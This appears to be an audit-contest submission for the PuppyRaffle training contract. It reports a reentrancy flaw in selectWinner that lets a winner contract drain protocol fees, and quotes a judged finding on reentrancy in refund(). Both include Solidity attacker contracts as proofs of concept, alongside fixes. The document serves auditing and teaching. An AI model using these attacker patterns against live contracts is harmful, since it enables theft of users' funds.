Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Reentrancy via ETH transfer and _safeMint allows draining protocol fees

frozen

Reentrancy via ETH Transfer and _safeMint External Callback causing Loss of Protocol Fees

Affected Files:

  • src/PuppyRaffle.sol

Description

Normal behavior:
The PuppyRaffle::selectWinner function is intended to finalize a raffle by selecting a winner, transferring the prize ETH to the winner, minting an NFT to the winner, and allowing protocol fees to be withdrawn later via PuppyRaffle::withdrawFees once only fees remain in the contract.

Issue:
PuppyRaffle::selectWinner performs multiple external interactions without reentrancy protection. It first sends ETH to the winner using a low-level call, then calls _safeMint, which triggers an external onERC721Received callback if the winner is a contract. During the ETH transfer, control is temporarily handed to the winner contract while selectWinner is still executing.

Because no reentrancy guard is in place, a malicious winner contract can re-enter other externally callable functions such as PuppyRaffle::withdrawFees before selectWinner() completes. At this point, the contract balance equals totalFees, allowing the withdrawal check to pass and enabling protocol fees to be drained.

// PuppyRaffle.sol
function selectWinner() external {
...
@> (bool success,) = winner.call{value: prizePool}("");
@> require(success, "PuppyRaffle: Failed to send prize pool to winner");
@> _safeMint(winner, tokenId);
}

Risk

Likelihood:

  • The raffle winner can be a contract, allowing arbitrary logic execution during ETH transfer or NFT mint callbacks.

  • The exploit reliably occurs whenever PuppyRaffle::selectWinner transfers the prize ETH and PuppyRaffle::withdrawFees remains externally callable without reentrancy protection.

Impact:

  • Protocol fees can be drained via cross-function reentrancy.

  • Loss of protocol revenue and violation of expected execution invariants.

Proof of Concept

contract MaliciousWinner {
IPuppyRaffle public raffle;
bool internal attacked;
constructor(address _raffle) {
raffle = IPuppyRaffle(_raffle);
}
receive() external payable {
if (!attacked) {
attacked = true;
raffle.withdrawFees();
}
}
}

When PuppyRaffle::selectWinner transfers the prize ETH, the receive() function is executed.
The attacker re-enters PuppyRaffle::withdrawFees before PuppyRaffle::selectWinner completes.
At this moment, address(this).balance == totalFees, causing the withdrawal check to pass and allowing protocol fees to be drained.

Recommended Mitigation

A. Add reentrancy protection to critical functions

Prevent cross-function reentrancy by using OpenZeppelin’s ReentrancyGuard.

+ import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
- contract PuppyRaffle is ERC721 {
+ contract PuppyRaffle is ERC721, ReentrancyGuard {
- function selectWinner() external {
+ function selectWinner() external nonReentrant {
- function withdrawFees() external {
+ function withdrawFees() external nonReentrant {

B. Avoid sending ETH during complex state transitions

Do not push ETH to external addresses while critical logic is still executing.
Instead, record balances and allow users to withdraw separately.

- (bool success,) = winner.call{value: prizePool}("");
- require(success, "PuppyRaffle: Failed to send prize pool to winner");
+ pendingRewards[winner] += prizePool;

Allow winners to claim funds explicitly, isolating ETH transfers into a single, simple function.

function withdrawReward() external nonReentrant {
uint256 amount = pendingRewards[msg.sender];
require(amount > 0, "No rewards available");
pendingRewards[msg.sender] = 0;
(bool success,) = msg.sender.call{value: amount}("");
require(success, "ETH transfer failed");
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 2 days ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!